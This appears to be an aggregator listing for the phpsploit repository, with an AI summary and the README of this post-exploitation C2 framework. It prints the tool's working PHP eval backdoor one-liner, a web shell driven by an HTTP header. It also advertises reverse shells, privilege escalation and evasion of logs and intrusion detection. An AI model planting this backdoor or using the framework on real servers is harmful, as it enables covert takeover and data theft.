~/hackyfeed
> cat /dev/github | grep security-tools
discovered 30 Mar 2026

phpsploit

Python โ˜… 2453 via github-topic
โ†’ View on GitHub

AI Summary: PhpSploit is a full-featured Command and Control (C2) framework that maintains a persistent presence on web servers using a polymorphic PHP one-liner. Its primary use case is for penetration testing and exploitation, enabling users to execute commands, manage files remotely, interact with a SQL console, and escalate privileges through over 20 available plugins. Notable features include obfuscated communication via HTTP headers and seamless file upload/download capabilities, facilitating robust interactions with target systems while bypassing standard PHP security measures.

README

Master

Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner tweet


Unit Tests workflow Dependabot status codacy code quality CodeQL workflow codecov coverage codeclimate maintainability

Created by nil0x42 and contributors

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server’s relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Quick Start

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Features

  • Efficient: More than 20 plugins to automate privilege-escalation tasks

    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells

  • Stealth: The framework is made by paranoids, for paranoids

    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support

  • Convenient: A robust interface with many crucial features

    • Detailed help for any option (help command)
    • Cross-platform on both client and server.
    • CLI supports auto-completion & multi-command
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms (as attacker):

  • GNU/Linux
  • Mac OS X

Supported platforms (as target):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT

Contributors

Thanks goes to these wonderful people:


nil0x42
๐Ÿ’ป ๐Ÿš‡ ๐Ÿ”Œ โš ๏ธ
shiney-wh
๐Ÿ’ป ๐Ÿ”Œ
Wannes Rombouts
๐Ÿ’ป ๐Ÿšง
Amine Ben Asker
๐Ÿ’ป ๐Ÿšง
jose nazario
๐Ÿ“– ๐Ÿ›
Sujit Ghosal
๐Ÿ“
Zerdoumi
๐Ÿ›

tristandostaler
๐Ÿ›
Rohan Tarai
๐Ÿ›
Jonas Lejon
๐Ÿ“

This project follows the all-contributors specification. Contributions of any kind welcome

post-exploitation red-team privilege-escalation exploit python